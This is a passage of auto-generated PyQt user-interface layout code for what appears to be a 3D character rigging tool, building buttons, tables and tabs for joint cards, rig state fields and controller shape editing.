self.mergeCardBtn = QtWidgets.QPushButton(self.widget_5)
self.mergeCardBtn.setObjectName("mergeCardBtn")
self.gridLayout_2.addWidget(self.mergeCardBtn, 0, 2, 1, 1)
self.label = QtWidgets.QLabel(self.widget_5)
self.label.setObjectName("label")
self.gridLayout_2.addWidget(self.label, 0, 0, 1, 1)
self.label_16 = QtWidgets.QLabel(self.widget_5)
self.label_16.setText("")
self.label_16.setObjectName("label_16")
self.gridLayout_2.addWidget(self.label_16, 0, 4, 1, 1)
self.splitCardBtn = QtWidgets.QPushButton(self.widget_5)
self.splitCardBtn.setObjectName("splitCardBtn")
self.gridLayout_2.addWidget(self.splitCardBtn, 0, 3, 1, 1)
self.addCardIkButton = QtWidgets.QPushButton(self.widget_5)
self.addCardIkButton.setObjectName("addCardIkButton")
self.gridLayout_2.addWidget(self.addCardIkButton, 0, 5, 1, 1)
self.label_2 = QtWidgets.QLabel(self.widget_5)
self.label_2.setObjectName("label_2")
self.gridLayout_2.addWidget(self.label_2, 1, 0, 1, 1)
self.duplicateCardBtn = QtWidgets.QPushButton(self.widget_5)
self.duplicateCardBtn.setObjectName("duplicateCardBtn")
self.gridLayout_2.addWidget(self.duplicateCardBtn, 0, 1, 1, 1)
self.remCardIkButton = QtWidgets.QPushButton(self.widget_5)
self.remCardIkButton.setObjectName("remCardIkButton")
self.gridLayout_2.addWidget(self.remCardIkButton, 0, 6, 1, 1)
self.insertJointBtn = QtWidgets.QPushButton(self.widget_5)
self.insertJointBtn.setObjectName("insertJointBtn")
self.gridLayout_2.addWidget(self.insertJointBtn, 1, 1, 1, 1)
self.addTipBtn = QtWidgets.QPushButton(self.widget_5)
self.addTipBtn.setObjectName("addTipBtn")
self.gridLayout_2.addWidget(self.addTipBtn, 1, 2, 1, 1)
self.deleteJointBtn = QtWidgets.QPushButton(self.widget_5)
self.deleteJointBtn.setObjectName("deleteJointBtn")
self.gridLayout_2.addWidget(self.deleteJointBtn, 1, 3, 1, 1)
self.customUpBtn = QtWidgets.QPushButton(self.widget_5)
self.customUpBtn.setObjectName("customUpBtn")
self.gridLayout_2.addWidget(self.customUpBtn, 1, 5, 1, 1)
self.horizontalLayout_7.addLayout(self.gridLayout_2)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_7.addItem(spacerItem1)
self.verticalLayout_2.addLayout(self.horizontalLayout_7)
self.jointLister = JointLister(self.widget_5)
self.jointLister.setColumnCount(6)
self.jointLister.setObjectName("jointLister")
self.jointLister.setColumnCount(6)
self.jointLister.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.jointLister.setHorizontalHeaderItem(5, item)
self.verticalLayout_2.addWidget(self.jointLister)
self.verticalLayout_3.addWidget(self.splitter)
self.propertyLayout = QtWidgets.QWidget(self.splitter_2)
self.propertyLayout.setMaximumSize(QtCore.QSize(403, 16777215))
self.propertyLayout.setObjectName("propertyLayout")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.propertyLayout)
self.verticalLayout_5.setContentsMargins(-1, 0, -1, -1)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.widget_7 = QtWidgets.QWidget(self.propertyLayout)
self.widget_7.setObjectName("widget_7")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.widget_7)
self.verticalLayout_4.setContentsMargins(-1, 0, -1, -1)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.widget_8 = QtWidgets.QWidget(self.widget_7)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widget_8.sizePolicy().hasHeightForWidth())
self.widget_8.setSizePolicy(sizePolicy)
self.widget_8.setMinimumSize(QtCore.QSize(0, 95))
self.widget_8.setMaximumSize(QtCore.QSize(16777215, 95))
self.widget_8.setObjectName("widget_8")
self.cardName = QtWidgets.QLabel(self.widget_8)
self.cardName.setGeometry(QtCore.QRect(10, 0, 151, 20))
self.cardName.setText("")
self.cardName.setObjectName("cardName")
self.cardType = QtWidgets.QLabel(self.widget_8)
self.cardType.setGeometry(QtCore.QRect(180, 0, 81, 20))
self.cardType.setText("")
self.cardType.setObjectName("cardType")
self.cardDescription = QtWidgets.QLabel(self.widget_8)
self.cardDescription.setGeometry(QtCore.QRect(10, 20, 261, 71))
self.cardDescription.setText("")
self.cardDescription.setWordWrap(True)
self.cardDescription.setObjectName("cardDescription")
self.verticalLayout_4.addWidget(self.widget_8)
self.cardParams = CardParams(self.widget_7)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cardParams.sizePolicy().hasHeightForWidth())
self.cardParams.setSizePolicy(sizePolicy)
self.cardParams.setMinimumSize(QtCore.QSize(0, 250))
self.cardParams.setObjectName("cardParams")
self.cardParams.setColumnCount(2)
self.cardParams.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.cardParams.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.cardParams.setHorizontalHeaderItem(1, item)
self.cardParams.horizontalHeader().setVisible(False)
self.cardParams.horizontalHeader().setStretchLastSection(True)
self.cardParams.verticalHeader().setVisible(False)
self.verticalLayout_4.addWidget(self.cardParams)
self.verticalLayout_5.addWidget(self.widget_7)
spacerItem2 = QtWidgets.QSpacerItem(20, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_5.addItem(spacerItem2)
self.rigStateContainer = QtWidgets.QWidget(self.propertyLayout)
self.rigStateContainer.setObjectName("rigStateContainer")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.rigStateContainer)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.updateRigState = QtWidgets.QPushButton(self.rigStateContainer)
self.updateRigState.setObjectName("updateRigState")
self.verticalLayout_6.addWidget(self.updateRigState)
self.rigStateTab = QtWidgets.QTabWidget(self.rigStateContainer)
self.rigStateTab.setTabPosition(QtWidgets.QTabWidget.West)
self.rigStateTab.setDocumentMode(False)
self.rigStateTab.setObjectName("rigStateTab")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_11 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_11.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.space_save = QtWidgets.QPushButton(self.tab_2)
self.space_save.setObjectName("space_save")
self.horizontalLayout_14.addWidget(self.space_save)
self.space_load = QtWidgets.QPushButton(self.tab_2)
self.space_load.setObjectName("space_load")
self.horizontalLayout_14.addWidget(self.space_load)
self.verticalLayout_11.addLayout(self.horizontalLayout_14)
self.spacesField = QtWidgets.QTextEdit(self.tab_2)
self.spacesField.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.spacesField.setObjectName("spacesField")
self.verticalLayout_11.addWidget(self.spacesField)
self.rigStateTab.addTab(self.tab_2, "")
self.tab_8 = QtWidgets.QWidget()
self.tab_8.setObjectName("tab_8")
self.verticalLayout_19 = QtWidgets.QVBoxLayout(self.tab_8)
self.verticalLayout_19.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_19.setObjectName("verticalLayout_19")
self.horizontalLayout_15 = QtWidgets.QHBoxLayout()
self.horizontalLayout_15.setObjectName("horizontalLayout_15")
self.vis_save = QtWidgets.QPushButton(self.tab_8)
self.vis_save.setObjectName("vis_save")
self.horizontalLayout_15.addWidget(self.vis_save)
self.vis_load = QtWidgets.QPushButton(self.tab_8)
self.vis_load.setObjectName("vis_load")
self.horizontalLayout_15.addWidget(self.vis_load)
self.verticalLayout_19.addLayout(self.horizontalLayout_15)
self.visGroupField = QtWidgets.QTextEdit(self.tab_8)
self.visGroupField.setObjectName("visGroupField")
self.verticalLayout_19.addWidget(self.visGroupField)
self.rigStateTab.addTab(self.tab_8, "")
self.tab_6 = QtWidgets.QWidget()
self.tab_6.setObjectName("tab_6")
self.verticalLayout_20 = QtWidgets.QVBoxLayout(self.tab_6)
self.verticalLayout_20.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_20.setObjectName("verticalLayout_20")
self.horizontalLayout_16 = QtWidgets.QHBoxLayout()
self.horizontalLayout_16.setObjectName("horizontalLayout_16")
self.shape_save = QtWidgets.QPushButton(self.tab_6)
self.shape_save.setObjectName("shape_save")
self.horizontalLayout_16.addWidget(self.shape_save)
self.verticalLayout_20.addLayout(self.horizontalLayout_16)
self.horizontalLayout_17 = QtWidgets.QHBoxLayout()
self.horizontalLayout_17.setObjectName("horizontalLayout_17")
self.shape_local_load = QtWidgets.QPushButton(self.tab_6)
self.shape_local_load.setObjectName("shape_local_load")
self.horizontalLayout_17.addWidget(self.shape_local_load)
self.shape_world_load = QtWidgets.QPushButton(self.tab_6)
self.shape_world_load.setObjectName("shape_world_load")
self.horizontalLayout_17.addWidget(self.shape_world_load)
self.verticalLayout_20.addLayout(self.horizontalLayout_17)
self.shapesField = QtWidgets.QTextEdit(self.tab_6)
self.shapesField.setObjectName("shapesField")
self.verticalLayout_20.addWidget(self.shapesField)
self.rigStateTab.addTab(self.tab_6, "")
self.tab_7 = QtWidgets.QWidget()
self.tab_7.setObjectName("tab_7")
self.verticalLayout_21 = QtWidgets.QVBoxLayout(self.tab_7)
self.verticalLayout_21.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_21.setObjectName("verticalLayout_21")
self.horizontalLayout_18 = QtWidgets.QHBoxLayout()
self.horizontalLayout_18.setObjectName("horizontalLayout_18")
self.constraints_save = QtWidgets.QPushButton(self.tab_7)
self.constraints_save.setObjectName("constraints_save")
self.horizontalLayout_18.addWidget(self.constraints_save)
self.constraints_load = QtWidgets.QPushButton(self.tab_7)
self.constraints_load.setObjectName("constraints_load")
self.horizontalLayout_18.addWidget(self.constraints_load)
self.verticalLayout_21.addLayout(self.horizontalLayout_18)
self.constraintsField = QtWidgets.QTextEdit(self.tab_7)
self.constraintsField.setObjectName("constraintsField")
self.verticalLayout_21.addWidget(self.constraintsField)
self.rigStateTab.addTab(self.tab_7, "")
self.tab_5 = QtWidgets.QWidget()
self.tab_5.setObjectName("tab_5")
self.verticalLayout_22 = QtWidgets.QVBoxLayout(self.tab_5)
self.verticalLayout_22.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_22.setObjectName("verticalLayout_22")
self.horizontalLayout_19 = QtWidgets.QHBoxLayout()
self.horizontalLayout_19.setObjectName("horizontalLayout_19")
self.connections_save = QtWidgets.QPushButton(self.tab_5)
self.connections_save.setObjectName("connections_save")
self.horizontalLayout_19.addWidget(self.connections_save)
self.connections_load = QtWidgets.QPushButton(self.tab_5)
self.connections_load.setObjectName("connections_load")
self.horizontalLayout_19.addWidget(self.connections_load)
self.verticalLayout_22.addLayout(self.horizontalLayout_19)
self.connectionsField = QtWidgets.QTextEdit(self.tab_5)
self.connectionsField.setObjectName("connectionsField")
self.verticalLayout_22.addWidget(self.connectionsField)
self.rigStateTab.addTab(self.tab_5, "")
self.tab_9 = QtWidgets.QWidget()
self.tab_9.setObjectName("tab_9")
self.verticalLayout_23 = QtWidgets.QVBoxLayout(self.tab_9)
self.verticalLayout_23.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_23.setObjectName("verticalLayout_23")
self.horizontalLayout_20 = QtWidgets.QHBoxLayout()
self.horizontalLayout_20.setObjectName("horizontalLayout_20")
self.driven_save = QtWidgets.QPushButton(self.tab_9)
self.driven_save.setObjectName("driven_save")
self.horizontalLayout_20.addWidget(self.driven_save)
self.driven_load = QtWidgets.QPushButton(self.tab_9)
self.driven_load.setObjectName("driven_load")
self.horizontalLayout_20.addWidget(self.driven_load)
self.verticalLayout_23.addLayout(self.horizontalLayout_20)
self.setDrivenField = QtWidgets.QTextEdit(self.tab_9)
self.setDrivenField.setObjectName("setDrivenField")
self.verticalLayout_23.addWidget(self.setDrivenField)
self.rigStateTab.addTab(self.tab_9, "")
self.tab_10 = QtWidgets.QWidget()
self.tab_10.setObjectName("tab_10")
self.verticalLayout_24 = QtWidgets.QVBoxLayout(self.tab_10)
self.verticalLayout_24.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_24.setObjectName("verticalLayout_24")
self.horizontalLayout_21 = QtWidgets.QHBoxLayout()
self.horizontalLayout_21.setObjectName("horizontalLayout_21")
self.custom_save = QtWidgets.QPushButton(self.tab_10)
self.custom_save.setObjectName("custom_save")
self.horizontalLayout_21.addWidget(self.custom_save)
self.custom_load = QtWidgets.QPushButton(self.tab_10)
self.custom_load.setObjectName("custom_load")
self.horizontalLayout_21.addWidget(self.custom_load)
self.verticalLayout_24.addLayout(self.horizontalLayout_21)
self.customAttrsField = QtWidgets.QTextEdit(self.tab_10)
self.customAttrsField.setObjectName("customAttrsField")
self.verticalLayout_24.addWidget(self.customAttrsField)
self.rigStateTab.addTab(self.tab_10, "")
self.tab_11 = QtWidgets.QWidget()
self.tab_11.setObjectName("tab_11")
self.verticalLayout_25 = QtWidgets.QVBoxLayout(self.tab_11)
self.verticalLayout_25.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_25.setObjectName("verticalLayout_25")
self.horizontalLayout_22 = QtWidgets.QHBoxLayout()
self.horizontalLayout_22.setObjectName("horizontalLayout_22")
self.locked_save = QtWidgets.QPushButton(self.tab_11)
self.locked_save.setObjectName("locked_save")
self.horizontalLayout_22.addWidget(self.locked_save)
self.locked_load = QtWidgets.QPushButton(self.tab_11)
self.locked_load.setObjectName("locked_load")
self.horizontalLayout_22.addWidget(self.locked_load)
self.verticalLayout_25.addLayout(self.horizontalLayout_22)
self.lockedAttrsField = QtWidgets.QTextEdit(self.tab_11)
self.lockedAttrsField.setObjectName("lockedAttrsField")
self.verticalLayout_25.addWidget(self.lockedAttrsField)
self.rigStateTab.addTab(self.tab_11, "")
self.verticalLayout_6.addWidget(self.rigStateTab)
self.verticalLayout_5.addWidget(self.rigStateContainer)
self.verticalLayout_5.setStretch(2, 1)
self.horizontalLayout_2.addWidget(self.splitter_2)
self.tabWidget.addTab(self.tab_3, "")
self.controller_edit = QtWidgets.QWidget()
self.controller_edit.setObjectName("controller_edit")
self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.controller_edit)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.verticalLayout_13 = QtWidgets.QVBoxLayout()
self.verticalLayout_13.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_13.setObjectName("verticalLayout_13")
self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
self.horizontalLayout_9.setContentsMargins(25, 25, 25, 25)
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.verticalLayout_16 = QtWidgets.QVBoxLayout()
self.verticalLayout_16.setContentsMargins(25, -1, -1, -1)
self.verticalLayout_16.setObjectName("verticalLayout_16")
self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
self.horizontalLayout_10.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_10.setObjectName("horizontalLayout_10")
self.verticalLayout_14 = QtWidgets.QVBoxLayout()
self.verticalLayout_14.setContentsMargins(0, -1, -1, -1)
self.verticalLayout_14.setObjectName("verticalLayout_14")
self.label_5 = QtWidgets.QLabel(self.controller_edit)
self.label_5.setObjectName("label_5")
self.verticalLayout_14.addWidget(self.label_5)
self.scrollArea = QtWidgets.QScrollArea(self.controller_edit)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents_2 = QtWidgets.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 341, 97))
self.scrollAreaWidgetContents_2.setObjectName("scrollAreaWidgetContents_2")
self.gridLayout_4 = QtWidgets.QGridLayout(self.scrollAreaWidgetContents_2)
self.gridLayout_4.setObjectName("gridLayout_4")
self.shape_chooser = QtWidgets.QGridLayout()
self.shape_chooser.setObjectName("shape_chooser")
self.gridLayout_4.addLayout(self.shape_chooser, 0, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout_14.addWidget(self.scrollArea)
self.horizontalLayout_10.addLayout(self.verticalLayout_14)
self.verticalLayout_15 = QtWidgets.QVBoxLayout()
self.verticalLayout_15.setContentsMargins(0, -1, -1, -1)
self.verticalLayout_15.setObjectName("verticalLayout_15")
self.label_11 = QtWidgets.QLabel(self.controller_edit)
self.label_11.setObjectName("label_11")
self.verticalLayout_15.addWidget(self.label_11)
self.surfaceColorGrid = QtWidgets.QGridLayout()
self.surfaceColorGrid.setObjectName("surfaceColorGrid")
self.verticalLayout_15.addLayout(self.surfaceColorGrid)
self.surfaceColorLayout = QtWidgets.QGridLayout()
self.surfaceColorLayout.setContentsMargins(-1, -1, -1, 55)
self.surfaceColorLayout.setObjectName("surfaceColorLayout")
self.verticalLayout_15.addLayout(self.surfaceColorLayout)
self.label_12 = QtWidgets.QLabel(self.controller_edit)
self.label_12.setObjectName("label_12")
self.verticalLayout_15.addWidget(self.label_12)
self.curveColorGrid = QtWidgets.QGridLayout()
self.curveColorGrid.setObjectName("curveColorGrid")
self.verticalLayout_15.addLayout(self.curveColorGrid)
self.curveColorLayout = QtWidgets.QGridLayout()
self.curveColorLayout.setObjectName("curveColorLayout")
self.verticalLayout_15.addLayout(self.curveColorLayout)
self.horizontalLayout_10.addLayout(self.verticalLayout_15)
self.verticalLayout_16.addLayout(self.horizontalLayout_10)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.verticalLayout_8 = QtWidgets.QVBoxLayout()
self.verticalLayout_8.setContentsMargins(-1, 0, -1, 0)
self.verticalLayout_8.setObjectName("verticalLayout_8")
self.gridLayout_3 = QtWidgets.QGridLayout()
self.gridLayout_3.setContentsMargins(-1, 0, -1, -1)
self.gridLayout_3.setObjectName("gridLayout_3")
self.label_13 = QtWidgets.QLabel(self.controller_edit)
self.label_13.setAlignment(QtCore.Qt.AlignCenter)
self.label_13.setObjectName("label_13")
self.gridLayout_3.addWidget(self.label_13, 0, 0, 1, 1)
self.label_14 = QtWidgets.QLabel(self.controller_edit)
self.label_14.setAlignment(QtCore.Qt.AlignCenter)
self.label_14.setObjectName("label_14")
self.gridLayout_3.addWidget(self.label_14, 0, 1, 1, 1)
self.copyShapes = QtWidgets.QPushButton(self.controller_edit)
self.copyShapes.setObjectName("copyShapes")
self.gridLayout_3.addWidget(self.copyShapes, 1, 0, 1, 1)
self.label_7 = QtWidgets.QLabel(self.controller_edit)
self.label_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_7.setObjectName("label_7")
self.gridLayout_3.addWidget(self.label_7, 0, 2, 1, 1)
self.select_cvs = QtWidgets.QPushButton(self.controller_edit)
self.select_cvs.setObjectName("select_cvs")
self.gridLayout_3.addWidget(self.select_cvs, 1, 2, 1, 1)
self.copyToCBBtn = QtWidgets.QPushButton(self.controller_edit)
self.copyToCBBtn.setObjectName("copyToCBBtn")
self.gridLayout_3.addWidget(self.copyToCBBtn, 1, 1, 1, 1)
self.pasteLocalBtn = QtWidgets.QPushButton(self.controller_edit)
self.pasteLocalBtn.setObjectName("pasteLocalBtn")
self.gridLayout_3.addWidget(self.pasteLocalBtn, 2, 1, 1, 1)
self.pasteWorldBtn = QtWidgets.QPushButton(self.controller_edit)
self.pasteWorldBtn.setObjectName("pasteWorldBtn")
self.gridLayout_3.addWidget(self.pasteWorldBtn, 3, 1, 1, 1)
self.select_band_edge_1 = QtWidgets.QPushButton(self.controller_edit)
self.select_band_edge_1.setObjectName("select_band_edge_1")
self.gridLayout_3.addWidget(self.select_band_edge_1, 3, 2, 1, 1)
self.mirrorShapes = QtWidgets.QPushButton(self.controller_edit)
self.mirrorShapes.setObjectName("mirrorShapes")
self.gridLayout_3.addWidget(self.mirrorShapes, 2, 0, 1, 1)
self.mirrorSide = QtWidgets.QPushButton(self.controller_edit)
self.mirrorSide.setObjectName("mirrorSide")
self.gridLayout_3.addWidget(self.mirrorSide, 3, 0, 1, 1)
self.select_pin_head = QtWidgets.QPushButton(self.controller_edit)
self.select_pin_head.setObjectName("select_pin_head")
self.gridLayout_3.addWidget(self.select_pin_head, 2, 2, 1, 1)
self.select_band_edge_2 = QtWidgets.QPushButton(self.controller_edit)
self.select_band_edge_2.setObjectName("select_band_edge_2")
self.gridLayout_3.addWidget(self.select_band_edge_2, 4, 2, 1, 1)
self.copyColor = QtWidgets.QPushButton(self.controller_edit)
self.copyColor.setObjectName("copyColor")
self.gridLayout_3.addWidget(self.copyColor, 4, 0, 1, 1)
self.verticalLayout_8.addLayout(self.gridLayout_3)
self.label_9 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_9.sizePolicy().hasHeightForWidth())
self.label_9.setSizePolicy(sizePolicy)
self.label_9.setAlignment(QtCore.Qt.AlignCenter)
self.label_9.setObjectName("label_9")
self.verticalLayout_8.addWidget(self.label_9)
self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
self.horizontalLayout_11.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout_11.setObjectName("horizontalLayout_11")
self.minus_ten = QtWidgets.QPushButton(self.controller_edit)
self.minus_ten.setObjectName("minus_ten")
self.horizontalLayout_11.addWidget(self.minus_ten)
self.minus_one = QtWidgets.QPushButton(self.controller_edit)
self.minus_one.setObjectName("minus_one")
self.horizontalLayout_11.addWidget(self.minus_one)
self.plus_one = QtWidgets.QPushButton(self.controller_edit)
self.plus_one.setObjectName("plus_one")
self.horizontalLayout_11.addWidget(self.plus_one)
self.plus_ten = QtWidgets.QPushButton(self.controller_edit)
self.plus_ten.setObjectName("plus_ten")
self.horizontalLayout_11.addWidget(self.plus_ten)
self.verticalLayout_8.addLayout(self.horizontalLayout_11)
self.label_10 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_10.sizePolicy().hasHeightForWidth())
self.label_10.setSizePolicy(sizePolicy)
self.label_10.setAlignment(QtCore.Qt.AlignBottom|QtCore.Qt.AlignHCenter)
self.label_10.setObjectName("label_10")
self.verticalLayout_8.addWidget(self.label_10)
self.gridLayout_5 = QtWidgets.QGridLayout()
self.gridLayout_5.setContentsMargins(-1, 0, -1, -1)
self.gridLayout_5.setObjectName("gridLayout_5")
self.rot_local_y = QtWidgets.QPushButton(self.controller_edit)
self.rot_local_y.setObjectName("rot_local_y")
self.gridLayout_5.addWidget(self.rot_local_y, 2, 0, 1, 1)
self.label_6 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_6.sizePolicy().hasHeightForWidth())
self.label_6.setSizePolicy(sizePolicy)
self.label_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_6.setObjectName("label_6")
self.gridLayout_5.addWidget(self.label_6, 0, 0, 1, 1)
self.label_8 = QtWidgets.QLabel(self.controller_edit)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_8.sizePolicy().hasHeightForWidth())
self.label_8.setSizePolicy(sizePolicy)
self.label_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_8.setObjectName("label_8")
self.gridLayout_5.addWidget(self.label_8, 0, 1, 1, 1)
self.rot_world_x = QtWidgets.QPushButton(self.controller_edit)
self.rot_world_x.setObjectName("rot_world_x")
self.gridLayout_5.addWidget(self.rot_world_x, 1, 1, 1, 1)
self.rot_local_x = QtWidgets.QPushButton(self.controller_edit)
self.rot_local_x.setObjectName("rot_local_x")
self.gridLayout_5.addWidget(self.rot_local_x, 1, 0, 1, 1)
self.rot_world_y = QtWidgets.QPushButton(self.controller_edit)
self.rot_world_y.setObjectName("rot_world_y")
self.gridLayout_5.addWidget(self.rot_world_y, 2, 1, 1, 1)
self.rot_local_z = QtWidgets.QPushButton(self.controller_edit)
self.rot_local_z.setObjectName("rot_local_z")
self.gridLayout_5.addWidget(self.rot_local_z, 3, 0, 1, 1)
self.rot_world_z = QtWidgets.QPushButton(self.controller_edit)
self.rot_world_z.setObjectName("rot_world_z")
self.gridLayout_5.addWidget(self.rot_world_z, 3, 1, 1, 1)
self.verticalLayout_8.addLayout(self.gridLayout_5)
self.horizontalLayout_3.addLayout(self.verticalLayout_8)
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem3)
self.verticalLayout_16.addLayout(self.horizontalLayout_3)
self.horizontalLayout_9.addLayout(self.verticalLayout_16)
self.controlCardList = QtWidgets.QTreeWidget(self.controller_edit)
self.controlCardList.setObjectName("controlCardList")
self.controlCardList.headerItem().setText(0, "1")
self.controlCardList.header().setVisible(False)
self.horizontalLayout_9.addWidget(self.controlCardList)
self.verticalLayout_13.addLayout(self.horizontalLayout_9)
spacerItem4 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_13.addItem(spacerItem4)
self.shapeDebug = QtWidgets.QTextEdit(self.controller_edit)
self.shapeDebug.setEnabled(True)
self.shapeDebug.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.shapeDebug.setObjectName("shapeDebug")
self.verticalLayout_13.addWidget(self.shapeDebug)
self.verticalLayout_7.addLayout(self.verticalLayout_13)
self.tabWidget.addTab(self.controller_edit, "")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.visGroups = QtWidgets.QListWidget(self.tab_4)
self.visGroups.setGeometry(QtCore.QRect(10, 10, 256, 381))
self.visGroups.setObjectName("visGroups")
self.verticalLayoutWidget_6 = QtWidgets.QWidget(self.tab_4)
self.verticalLayoutWidget_6.setGeometry(QtCore.QRect(280, 10, 341, 381))
self.verticalLayoutWidget_6.setObjectName("verticalLayoutWidget_6")
self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_6)
self.verticalLayout_9.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.unequipVisControl = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.unequipVisControl.setObjectName("unequipVisControl")
self.verticalLayout_9.addWidget(self.unequipVisControl)
self.equipVisControl = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.equipVisControl.setObjectName("equipVisControl")
self.verticalLayout_9.addWidget(self.equipVisControl)
self.pruneVisGroups = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.pruneVisGroups.setObjectName("pruneVisGroups")
self.verticalLayout_9.addWidget(self.pruneVisGroups)
self.widget_3 = QtWidgets.QWidget(self.verticalLayoutWidget_6)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widget_3.sizePolicy().hasHeightForWidth())
self.widget_3.setSizePolicy(sizePolicy)
self.widget_3.setMinimumSize(QtCore.QSize(0, 100))
self.widget_3.setMaximumSize(QtCore.QSize(16777215, 100))
self.widget_3.setObjectName("widget_3")
self.verticalLayout_9.addWidget(self.widget_3)
self.tagAsMain = QtWidgets.QPushButton(self.verticalLayoutWidget_6)
self.tagAsMain.setObjectName("tagAsMain")
self.verticalLayout_9.addWidget(self.tagAsMain)
spacerItem5 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_9.addItem(spacerItem5)
self.verticalLayoutWidget_7 = QtWidgets.QWidget(self.tab_4)
self.verticalLayoutWidget_7.setGeometry(QtCore.QRect(10, 400, 611, 151))
self.verticalLayoutWidget_7.setObjectName("verticalLayoutWidget_7")
self.verticalLayout_10 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_7)
self.verticalLayout_10.setContentsMargins(-1, -1, -1, 0)
self.verticalLayout_10.setObjectName("verticalLayout_10")
self.label_3 = QtWidgets.QLabel(self.verticalLayoutWidget_7)
